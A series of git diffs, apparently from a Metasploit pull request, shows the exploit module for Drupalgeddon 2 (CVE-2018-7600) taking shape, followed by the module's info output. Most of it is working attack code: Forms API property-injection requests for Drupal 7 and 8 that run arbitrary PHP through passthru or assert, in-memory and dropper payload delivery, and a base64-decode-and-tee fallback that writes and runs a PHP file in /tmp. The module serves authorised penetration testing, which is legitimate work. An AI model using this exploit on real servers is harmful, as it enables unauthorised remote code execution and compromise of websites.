       'uri'    => target_uri.path
@@ -213,12 +292,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return unless res && res.code == 200
 
-    case res.headers['X-Generator']
-    when /Drupal 7/
-      return Gem::Version.new('7.x')
-    when /Drupal 8/
-      return Gem::Version.new('8.x')
-    end
+    @version =
+      case res.headers['X-Generator']
+      when /Drupal 7/
+        Gem::Version.new('7.x')
+      when /Drupal 8/
+        Gem::Version.new('8.x')
+      end
 
     generator = res.get_html_document.at(
       '//meta[@name = "Generator"]/@content'
@@ -226,12 +306,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return unless generator
 
-    case generator.value
-    when /Drupal 7/
-      Gem::Version.new('7.x')
-    when /Drupal 8/
-      Gem::Version.new('8.x')
-    end
+    @version =
+      case generator.value
+      when /Drupal 7/
+        Gem::Version.new('7.x')
+      when /Drupal 8/
+        Gem::Version.new('8.x')
+      end
   end
 
   def exploit_drupal7(func, code)

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -135,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Drupal #{@version} targeted at #{full_uri}")
       checkcode = CheckCode::Detected
     else
-      print_error('Could not configure Drupal version')
+      print_error('Could not determine Drupal version to target')
       return CheckCode::Unknown
     end
 

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ['URL', 'https://github.com/a2u/CVE-2018-7600'],
         ['URL', 'https://github.com/nixawk/labs/issues/19'],
         ['URL', 'https://github.com/FireFart/CVE-2018-7600'],
+        ['AKA', 'SA-CORE-2018-002'],
         ['AKA', 'Drupalgeddon 2']
       ],
       'DisclosureDate' => 'Mar 28 2018',

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -44,6 +44,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => false,
       # XXX: Using "x" in Gem::Version::new isn't technically appropriate
       'Targets'        => [
+        ['Automatic (Unix In-Memory)',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD
+        ],
+        ['Automatic (Linux Dropper)',
+         'Platform'    => 'linux',
+         'Arch'        => [ARCH_X86, ARCH_X64]
+        ],
         ['Drupal 7.x (Unix In-Memory)',
          'Platform'    => 'unix',
          'Arch'        => ARCH_CMD,
@@ -65,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Version'     => Gem::Version.new('8.x')
         ]
       ],
-      'DefaultTarget'  => 2, # Drupal 8.x (Unix In-Memory)
+      'DefaultTarget'  => 0, # Automatic (Unix In-Memory)
       'DefaultOptions' => {
         'PAYLOAD'      => 'cmd/unix/generic',
         'CMD'          => 'id; uname -a'
@@ -113,6 +121,15 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Executing with #{func}(): #{cmd}")
 
     res = case target['Version'].to_s
+    when '' # Automatic
+      case detect_version.to_s
+      when '7.x'
+        print_good('Drupal 7 detected')
+        exploit_drupal7(func, cmd)
+      when '8.x'
+        print_good('Drupal 8 detected')
+        exploit_drupal8(func, cmd)
+      end
     when '7.x'
       exploit_drupal7(func, cmd)
     when '8.x'
@@ -120,13 +137,42 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     unless res && res.code == 200
-      vprint_error("Unexpected final reply: #{res.inspect}")
+      print_error("Unexpected reply: #{res.inspect}")
       return
     end
 
     print_line(res.body) if datastore['DUMP_OUTPUT']
 
     res
+  end
+
+  def detect_version
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => target_uri.path
+    )
+
+    return res unless res && res.code == 200
+
+    case res.headers['X-Generator']
+    when /Drupal 7/
+      return Gem::Version.new('7.x')
+    when /Drupal 8/
+      return Gem::Version.new('8.x')
+    end
+
+    generator = res.get_html_document.at(
+      '//meta[@name = "Generator"]/@content'
+    )
+
+    return res unless generator
+
+    case generator.value
+    when /Drupal 7/
+      Gem::Version.new('7.x')
+    when /Drupal 8/
+      Gem::Version.new('8.x')
+    end
   end
 
   def exploit_drupal7(func, code)
@@ -149,28 +195,20 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => vars_post
     )
 
-    unless res && res.code == 200
-      vprint_error("Unexpected intermediate reply: #{res.inspect}")
-      return
-    end
+    return res unless res && res.code == 200
 
     form_build_id = res.get_html_document.at(
       '//input[@name = "form_build_id"]/@value'
     )
 
-    if form_build_id
-      form_build_id = form_build_id.value
-    else
-      vprint_error("Unknown form_build_id: #{res.inspect}")
-      return
-    end
+    return res unless form_build_id
 
     vars_get = {
-      'q' => "file/ajax/name/#value/#{form_build_id}"
+      'q' => "file/ajax/name/#value/#{form_build_id.value}"
     }
 
     vars_post = {
-      'form_build_id' => form_build_id
+      'form_build_id' => form_build_id.value
     }
 
     send_request_cgi(

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -142,20 +142,24 @@ class MetasploitModule < Msf::Exploit::Remote
     # TODO: passthru() may be disabled, so try others
     func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'
 
-    version =
+    @version ||=
       if target['Version']
         target['Version'].to_s
       else
         detect_version.to_s
       end
 
-    return if version.empty?
+    return if @version.empty?
 
-    print_good("Drupal #{version} detected at #{full_uri}")
+    unless @version_printed
+      print_good("Drupal #{@version} detected at #{full_uri}")
+      @version_printed = true
+    end
+
     vprint_status("Executing with #{func}(): #{cmd}")
 
     res =
-      case version
+      case @version
       when '7.x'
         exploit_drupal7(func, cmd)
       when '8.x'

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -257,7 +257,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # TODO: passthru() may be disabled, so try others
     func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'
 
-    print_status("Executing with #{func}(): #{cmd}")
+    vprint_status("Executing with #{func}(): #{cmd}")
 
     res =
       case @version.to_s

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -53,19 +53,23 @@ class MetasploitModule < Msf::Exploit::Remote
         #
         ['Automatic (PHP In-Memory)',
          'Platform'    => 'php',
-         'Arch'        => ARCH_PHP
+         'Arch'        => ARCH_PHP,
+         'Type'        => :php_memory
         ],
         ['Automatic (PHP Dropper)',
          'Platform'    => 'php',
-         'Arch'        => ARCH_PHP
+         'Arch'        => ARCH_PHP,
+         'Type'        => :php_dropper
         ],
         ['Automatic (Unix In-Memory)',
          'Platform'    => 'unix',
-         'Arch'        => ARCH_CMD
+         'Arch'        => ARCH_CMD,
+         'Type'        => :unix_memory
         ],
         ['Automatic (Linux Dropper)',
          'Platform'    => 'linux',
-         'Arch'        => [ARCH_X86, ARCH_X64]
+         'Arch'        => [ARCH_X86, ARCH_X64],
+         'Type'        => :linux_dropper
         ],
         #
         # Drupal 7.x targets (PHP, cmd/unix, native)
@@ -73,22 +77,26 @@ class MetasploitModule < Msf::Exploit::Remote
         ['Drupal 7.x (PHP In-Memory)',
          'Platform'    => 'php',
          'Arch'        => ARCH_PHP,
-         'Version'     => Gem::Version.new('7.x')
+         'Version'     => Gem::Version.new('7.x'),
+         'Type'        => :php_memory
         ],
         ['Drupal 7.x (PHP Dropper)',
          'Platform'    => 'php',
          'Arch'        => ARCH_PHP,
-         'Version'     => Gem::Version.new('7.x')
+         'Version'     => Gem::Version.new('7.x'),
+         'Type'        => :php_dropper
         ],
         ['Drupal 7.x (Unix In-Memory)',
          'Platform'    => 'unix',
          'Arch'        => ARCH_CMD,
-         'Version'     => Gem::Version.new('7.x')
+         'Version'     => Gem::Version.new('7.x'),
+         'Type'        => :unix_memory
         ],
         ['Drupal 7.x (Linux Dropper)',
          'Platform'    => 'linux',
          'Arch'        => [ARCH_X86, ARCH_X64],
-         'Version'     => Gem::Version.new('7.x')
+         'Version'     => Gem::Version.new('7.x'),
+         'Type'        => :linux_dropper
         ],
         #
         # Drupal 8.x targets (PHP, cmd/unix, native)
@@ -96,22 +104,26 @@ class MetasploitModule < Msf::Exploit::Remote
         ['Drupal 8.x (PHP In-Memory)',
          'Platform'    => 'php',
          'Arch'        => ARCH_PHP,
-         'Version'     => Gem::Version.new('8.x')
+         'Version'     => Gem::Version.new('8.x'),
+         'Type'        => :php_memory
         ],
         ['Drupal 8.x (PHP Dropper)',
          'Platform'    => 'php',
          'Arch'        => ARCH_PHP,
-         'Version'     => Gem::Version.new('8.x')
+         'Version'     => Gem::Version.new('8.x'),
+         'Type'        => :php_dropper
         ],
         ['Drupal 8.x (Unix In-Memory)',
          'Platform'    => 'unix',
          'Arch'        => ARCH_CMD,
-         'Version'     => Gem::Version.new('8.x')
+         'Version'     => Gem::Version.new('8.x'),
+         'Type'        => :unix_memory
         ],
         ['Drupal 8.x (Linux Dropper)',
          'Platform'    => 'linux',
          'Arch'        => [ARCH_X86, ARCH_X64],
-         'Version'     => Gem::Version.new('8.x')
+         'Version'     => Gem::Version.new('8.x'),
+         'Type'        => :linux_dropper
         ]
       ],
       'DefaultTarget'  => 0, # Automatic (PHP In-Memory)
@@ -168,8 +180,8 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # NOTE: assert() is attempted first, then PHP_FUNC if that fails
-    case target.name
-    when /PHP In-Memory/
+    case target['Type']
+    when :php_memory
       execute_command(payload.encoded, func: 'assert')
 
       sleep(wfs_delay)
@@ -177,9 +189,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # XXX: This will spawn a *very* obvious process
       execute_command("php -r '#{payload.encoded}'")
-    when /Unix In-Memory/
+    when :unix_memory
       execute_command(payload.encoded)
-    when /PHP Dropper/, /Linux Dropper/
+    when :php_dropper, :linux_dropper
       dropper_assert
 
       sleep(wfs_delay)

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -142,7 +142,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if drupal_unpatched?
-      print_status('Drupal appears unpatched in CHANGELOG.txt')
+      print_good('Drupal appears unpatched in CHANGELOG.txt')
       checkcode = CheckCode::Appears
     end
 

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -75,7 +75,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),
       OptString.new('PHP_FUNC',  [true, 'PHP function to execute', 'passthru']),
-      OptBool.new('CLEAN_URLS',  [false, 'If clean URLs are enabled', true]),
       OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])
     ])
   end
@@ -132,6 +131,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit_drupal7(func, code)
     vars_get = {
+      'q'                    => 'user/password',
       'name[#post_render][]' => func,
       'name[#markup]'        => code,
       'name[#type]'          => 'markup'
@@ -142,16 +142,9 @@ class MetasploitModule < Msf::Exploit::Remote
       '_triggering_element_name' => 'name'
     }
 
-    if datastore['CLEAN_URLS']
-      uri = normalize_uri(target_uri.path, '/user/password')
-    else
-      uri      = target_uri.path
-      vars_get = {'q' => 'user/password'}.merge(vars_get)
-    end
-
     res = send_request_cgi(
       'method'    => 'POST',
-      'uri'       => uri,
+      'uri'       => target_uri.path,
       'vars_get'  => vars_get,
       'vars_post' => vars_post
     )
@@ -182,13 +175,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method'    => 'POST',
-      'uri'       => uri,
+      'uri'       => target_uri.path,
       'vars_get'  => vars_get,
       'vars_post' => vars_post
     )
   end
 
   def exploit_drupal8(func, code)
+    # Clean URLs are enabled by default and "can't" be disabled
+    uri = normalize_uri(target_uri.path, 'user/register')
+
     vars_get = {
       'element_parents' => 'account/mail/#value',
       'ajax_form'       => 1,
@@ -202,13 +198,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'mail[#post_render][]' => func,
       'mail[#markup]'        => code
     }
-
-    if datastore['CLEAN_URLS']
-      uri = normalize_uri(target_uri.path, '/user/register')
-    else
-      uri      = target_uri.path
-      vars_get = {'q' => 'user/register'}.merge(vars_get)
-    end
 
     send_request_cgi(
       'method'    => 'POST',

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -8,17 +8,23 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Drupal Drupalgeddon 2',
+      'Name'           => 'Drupal Drupalgeddon 2 Forms API Property Injection',
       'Description'    => %q{
-        This module exploits a vulnerability.
+        This module exploits a Drupal property injection in the Forms API.
+
+        Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.
+
+        Tested on 7.57 and 8.4.5.
       },
       'Author'         => [
         'Jasper Mattsson', # Vulnerability discovery
-        'a2u',             # Proof of concept
-        'Nixawk',          # Proof of concept
+        'a2u',             # Proof of concept (Drupal 8.x)
+        'Nixawk',          # Proof of concept (Drupal 8.x)
+        'FireFart',        # Proof of concept (Drupal 7.x)
         'wvu'              # Metasploit module
       ],
       'References'     => [
@@ -27,17 +33,39 @@ class MetasploitModule < Msf::Exploit::Remote
         ['URL', 'https://greysec.net/showthread.php?tid=2912'],
         ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],
         ['URL', 'https://github.com/a2u/CVE-2018-7600'],
-        ['URL', 'https://github.com/nixawk/labs/issues/19']
+        ['URL', 'https://github.com/nixawk/labs/issues/19'],
+        ['URL', 'https://github.com/FireFart/CVE-2018-7600'],
+        ['AKA', 'Drupalgeddon 2']
       ],
       'DisclosureDate' => 'Mar 28 2018',
       'License'        => MSF_LICENSE,
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
+      'Platform'       => ['unix', 'linux'],
+      'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
       'Privileged'     => false,
+      # XXX: Using "x" in Gem::Version::new isn't technically appropriate
       'Targets'        => [
-        ['Drupal < 7.58, < 8.3.9, < 8.4.6, < 8.5.1', {}]
+        ['Drupal 7.x (Unix In-Memory)',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Version'     => Gem::Version.new('7.x')
+        ],
+        ['Drupal 7.x (Linux Dropper)',
+         'Platform'    => 'linux',
+         'Arch'        => [ARCH_X86, ARCH_X64],
+         'Version'     => Gem::Version.new('7.x')
+        ],
+        ['Drupal 8.x (Unix In-Memory)',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Version'     => Gem::Version.new('8.x')
+        ],
+        ['Drupal 8.x (Linux Dropper)',
+         'Platform'    => 'linux',
+         'Arch'        => [ARCH_X86, ARCH_X64],
+         'Version'     => Gem::Version.new('8.x')
+        ]
       ],
-      'DefaultTarget'  => 0,
+      'DefaultTarget'  => 2, # Drupal 8.x (Unix In-Memory)
       'DefaultOptions' => {
         'PAYLOAD'      => 'cmd/unix/generic',
         'CMD'          => 'id; uname -a'
@@ -46,15 +74,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),
+      OptString.new('PHP_FUNC',  [true, 'PHP function to execute', 'passthru']),
       OptBool.new('CLEAN_URLS',  [false, 'If clean URLs are enabled', true]),
-      OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', true])
+      OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])
     ])
   end
 
   def check
     token = Rex::Text.rand_text_alphanumeric(8..42)
 
-    res = exploit(code: "echo #{token}")
+    res = execute_command(token, func: 'printf')
 
     if res && res.body.include?(token)
       return CheckCode::Vulnerable
@@ -63,41 +92,130 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Safe
   end
 
-  # TODO: passthru() may be disabled, so try others
-  def exploit(func: 'passthru', code: payload.encoded)
-    if datastore['CLEAN_URLS']
-      register = '/user/register'
-    else
-      register = '?q=user/register'
+  def exploit
+    if datastore['PAYLOAD'] == 'cmd/unix/generic'
+      print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')
+      # XXX: Naughty datastore modification
+      datastore['DUMP_OUTPUT'] = true
     end
 
-    print_status("Executing on target: #{code}")
+    case target.name
+    when /In-Memory/
+      execute_command(payload.encoded)
+    when /Dropper/
+      execute_cmdstager
+    end
+  end
 
-    res = send_request_cgi(
-      'method'    => 'POST',
-      'uri'       => normalize_uri(target_uri.path, register),
-      'vars_get'  => {
-        'element_parents' => 'account/mail/#value',
-        'ajax_form'       => 1,
-        '_wrapper_format' => 'drupal_ajax'
-      },
-      'vars_post' => {
-        'form_id'              => 'user_register_form',
-        '_drupal_ajax'         => 1,
-        'mail[#type]'          => 'markup',
-        'mail[#post_render][]' => func,
-        'mail[#markup]'        => code
-      }
-    )
+  def execute_command(cmd, opts = {})
+    # TODO: passthru() may be disabled, so try others
+    func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'
 
-    if res.nil? || res.code != 200
-      print_error("Unexpected reply: #{res.inspect}")
-      return nil
+    vprint_status("Executing with #{func}(): #{cmd}")
+
+    res = case target['Version'].to_s
+    when '7.x'
+      exploit_drupal7(func, cmd)
+    when '8.x'
+      exploit_drupal8(func, cmd)
+    end
+
+    unless res && res.code == 200
+      vprint_error("Unexpected final reply: #{res.inspect}")
+      return
     end
 
     print_line(res.body) if datastore['DUMP_OUTPUT']
 
     res
+  end
+
+  def exploit_drupal7(func, code)
+    vars_get = {
+      'name[#post_render][]' => func,
+      'name[#markup]'        => code,
+      'name[#type]'          => 'markup'
+    }
+
+    vars_post = {
+      'form_id'                  => 'user_pass',
+      '_triggering_element_name' => 'name'
+    }
+
+    if datastore['CLEAN_URLS']
+      uri = normalize_uri(target_uri.path, '/user/password')
+    else
+      uri      = target_uri.path
+      vars_get = {'q' => 'user/password'}.merge(vars_get)
+    end
+
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => uri,
+      'vars_get'  => vars_get,
+      'vars_post' => vars_post
+    )
+
+    unless res && res.code == 200
+      vprint_error("Unexpected intermediate reply: #{res.inspect}")
+      return
+    end
+
+    form_build_id = res.get_html_document.at(
+      '//input[@name = "form_build_id"]/@value'
+    )
+
+    if form_build_id
+      form_build_id = form_build_id.value
+    else
+      vprint_error("Unknown form_build_id: #{res.inspect}")
+      return
+    end
+
+    vars_get = {
+      'q' => "file/ajax/name/#value/#{form_build_id}"
+    }
+
+    vars_post = {
+      'form_build_id' => form_build_id
+    }
+
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => uri,
+      'vars_get'  => vars_get,
+      'vars_post' => vars_post
+    )
+  end
+
+  def exploit_drupal8(func, code)
+    vars_get = {
+      'element_parents' => 'account/mail/#value',
+      'ajax_form'       => 1,
+      '_wrapper_format' => 'drupal_ajax'
+    }
+
+    vars_post = {
+      'form_id'              => 'user_register_form',
+      '_drupal_ajax'         => 1,
+      'mail[#type]'          => 'markup',
+      'mail[#post_render][]' => func,
+      'mail[#markup]'        => code
+    }
+
+    if datastore['CLEAN_URLS']
+      uri = normalize_uri(target_uri.path, '/user/register')
+    else
+      uri      = target_uri.path
+      vars_get = {'q' => 'user/register'}.merge(vars_get)
+    end
+
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => uri,
+      'vars_get'  => vars_get,
+      'vars_post' => vars_post
+    )
   end
 
 end

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -118,23 +118,25 @@ class MetasploitModule < Msf::Exploit::Remote
     # TODO: passthru() may be disabled, so try others
     func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'
 
+    version =
+      if target['Version']
+        target['Version'].to_s
+      else
+        detect_version.to_s
+      end
+
+    return if version.empty?
+
+    print_good("Drupal #{version} detected at #{full_uri}")
     vprint_status("Executing with #{func}(): #{cmd}")
 
-    res = case target['Version'].to_s
-    when '' # Automatic
-      case detect_version.to_s
+    res =
+      case version
       when '7.x'
-        print_good('Drupal 7 detected')
         exploit_drupal7(func, cmd)
       when '8.x'
-        print_good('Drupal 8 detected')
         exploit_drupal8(func, cmd)
       end
-    when '7.x'
-      exploit_drupal7(func, cmd)
-    when '8.x'
-      exploit_drupal8(func, cmd)
-    end
 
     unless res && res.code == 200
       print_error("Unexpected reply: #{res.inspect}")
@@ -152,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'    => target_uri.path
     )
 
-    return res unless res && res.code == 200
+    return unless res && res.code == 200
 
     case res.headers['X-Generator']
     when /Drupal 7/
@@ -165,7 +167,7 @@ class MetasploitModule < Msf::Exploit::Remote
       '//meta[@name = "Generator"]/@content'
     )
 
-    return res unless generator
+    return unless generator
 
     case generator.value
     when /Drupal 7/

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -113,7 +113,8 @@ class MetasploitModule < Msf::Exploit::Remote
          'Version'     => Gem::Version.new('8.x')
         ]
       ],
-      'DefaultTarget'  => 0 # Automatic (PHP In-Memory)
+      'DefaultTarget'  => 0, # Automatic (PHP In-Memory)
+      'DefaultOptions' => {'WfsDelay' => 2}
     ))
 
     register_options([
@@ -124,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_advanced_options([
       OptBool.new('ForceExploit',  [false, 'Override check result', false]),
-      OptString.new('WritableDir', [false, 'Writable dir for dropped binaries'])
+      OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])
     ])
   end
 
@@ -160,25 +161,25 @@ class MetasploitModule < Msf::Exploit::Remote
       datastore['DUMP_OUTPUT'] = true
     end
 
+    # NOTE: assert() is attempted first, then PHP_FUNC if that fails
     case target.name
     when /PHP In-Memory/
-      case @version.to_s
-      when '7.x'
-        # In-process execution when assert() is enabled
-        execute_command(payload.encoded, func: 'assert')
-      when '8.x'
-        # XXX: This will spawn a *very* obvious process
-        execute_command("php -r '#{payload.encoded}'")
-      end
+      execute_command(payload.encoded, func: 'assert')
+
+      sleep(wfs_delay)
+      return if session_created?
+
+      # XXX: This will spawn a *very* obvious process
+      execute_command("php -r '#{payload.encoded}'")
     when /Unix In-Memory/
       execute_command(payload.encoded)
     when /PHP Dropper/, /Linux Dropper/
-      case @version.to_s
-      when '7.x'
-        execute_dropper7
-      when '8.x'
-        execute_dropper8
-      end
+      dropper_assert
+
+      sleep(wfs_delay)
+      return if session_created?
+
+      dropper_exec
     end
   end
 
@@ -192,8 +193,10 @@ class MetasploitModule < Msf::Exploit::Remote
     super
   end
 
-  def execute_dropper7
-    php_file = "#{random_crap}.php"
+  def dropper_assert
+    php_file = Pathname.new(
+      "#{datastore['WritableDir']}/#{random_crap}.php"
+    ).cleanpath
 
     # Return the PHP payload or a PHP binary dropper
     dropper = get_write_exec_payload(
@@ -222,8 +225,11 @@ class MetasploitModule < Msf::Exploit::Remote
     execute_command(stage2.strip, func: 'assert')
   end
 
-  def execute_dropper8
+  def dropper_exec
     php_file = "#{random_crap}.php"
+    tmp_file = Pathname.new(
+      "#{datastore['WritableDir']}/#{php_file}"
+    ).cleanpath
 
     # Return the PHP payload or a PHP binary dropper
     dropper = get_write_exec_payload(
@@ -247,10 +253,20 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'    => normalize_uri(target_uri.path, php_file)
     )
 
+    sleep(wfs_delay)
     return if session_created?
 
     # Last-ditch effort to get a shell with PHP CLI
     execute_command("php #{php_file}")
+
+    sleep(wfs_delay)
+    return if session_created?
+
+    register_file_for_cleanup(tmp_file)
+
+    # Fall back on our temp file
+    execute_command("echo #{dropper} | base64 -d | tee #{tmp_file}")
+    execute_command("php #{tmp_file}")
   end
 
   def execute_command(cmd, opts = {})

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -1,0 +1,103 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Drupal Drupalgeddon 2',
+      'Description'    => %q{
+        This module exploits a vulnerability.
+      },
+      'Author'         => [
+        'Jasper Mattsson', # Vulnerability discovery
+        'a2u',             # Proof of concept
+        'Nixawk',          # Proof of concept
+        'wvu'              # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2018-7600'],
+        ['URL', 'https://www.drupal.org/sa-core-2018-002'],
+        ['URL', 'https://greysec.net/showthread.php?tid=2912'],
+        ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],
+        ['URL', 'https://github.com/a2u/CVE-2018-7600'],
+        ['URL', 'https://github.com/nixawk/labs/issues/19']
+      ],
+      'DisclosureDate' => 'Mar 28 2018',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Drupal < 7.58, < 8.3.9, < 8.4.6, < 8.5.1', {}]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'PAYLOAD'      => 'cmd/unix/generic',
+        'CMD'          => 'id; uname -a'
+      }
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),
+      OptBool.new('CLEAN_URLS',  [false, 'If clean URLs are enabled', true]),
+      OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', true])
+    ])
+  end
+
+  def check
+    token = Rex::Text.rand_text_alphanumeric(8..42)
+
+    res = exploit(code: "echo #{token}")
+
+    if res && res.body.include?(token)
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  end
+
+  # TODO: passthru() may be disabled, so try others
+  def exploit(func: 'passthru', code: payload.encoded)
+    if datastore['CLEAN_URLS']
+      register = '/user/register'
+    else
+      register = '?q=user/register'
+    end
+
+    print_status("Executing on target: #{code}")
+
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, register),
+      'vars_get'  => {
+        'element_parents' => 'account/mail/#value',
+        'ajax_form'       => 1,
+        '_wrapper_format' => 'drupal_ajax'
+      },
+      'vars_post' => {
+        'form_id'              => 'user_register_form',
+        '_drupal_ajax'         => 1,
+        'mail[#type]'          => 'markup',
+        'mail[#post_render][]' => func,
+        'mail[#markup]'        => code
+      }
+    )
+
+    if res.nil? || res.code != 200
+      print_error("Unexpected reply: #{res.inspect}")
+      return nil
+    end
+
+    print_line(res.body) if datastore['DUMP_OUTPUT']
+
+    res
+  end
+
+end

--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -262,7 +262,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sleep(wfs_delay)
     return if session_created?
 
-    # Last-ditch effort to get a shell with PHP CLI
+    # Try to get a shell with PHP CLI
     execute_command("php #{php_file}")
 
     sleep(wfs_delay)


### PR DESCRIPTION
```
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > info

       Name: Drupal Drupalgeddon 2 Forms API Property Injection
     Module: exploit/unix/webapp/drupal_drupalgeddon2
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2018-03-28

Provided by:
  Jasper Mattsson
  a2u
  Nixawk
  FireFart
  wvu <wvu@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic (PHP In-Memory)
  1   Automatic (PHP Dropper)
  2   Automatic (Unix In-Memory)
  3   Automatic (Linux Dropper)
  4   Drupal 7.x (PHP In-Memory)
  5   Drupal 7.x (PHP Dropper)
  6   Drupal 7.x (Unix In-Memory)
  7   Drupal 7.x (Linux Dropper)
  8   Drupal 8.x (PHP In-Memory)
  9   Drupal 8.x (PHP Dropper)
  10  Drupal 8.x (Unix In-Memory)
  11  Drupal 8.x (Linux Dropper)

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  DUMP_OUTPUT  false            no        If output should be dumped
  PHP_FUNC     passthru         yes       PHP function to execute
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                         yes       The target address
  RPORT        80               yes       The target port (TCP)
  SSL          false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       Path to Drupal install
  VHOST                         no        HTTP server virtual host

Payload information:
  Avoid: 3 characters

Description:
  This module exploits a Drupal property injection in the Forms API.
  Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are
  vulnerable.

References:
  https://cvedetails.com/cve/CVE-2018-7600/
  https://www.drupal.org/sa-core-2018-002
  https://greysec.net/showthread.php?tid=2912
  https://research.checkpoint.com/uncovering-drupalgeddon-2/
  https://github.com/a2u/CVE-2018-7600
  https://github.com/nixawk/labs/issues/19
  https://github.com/FireFart/CVE-2018-7600
  Also known as: SA-CORE-2018-002
  Also known as: Drupalgeddon 2

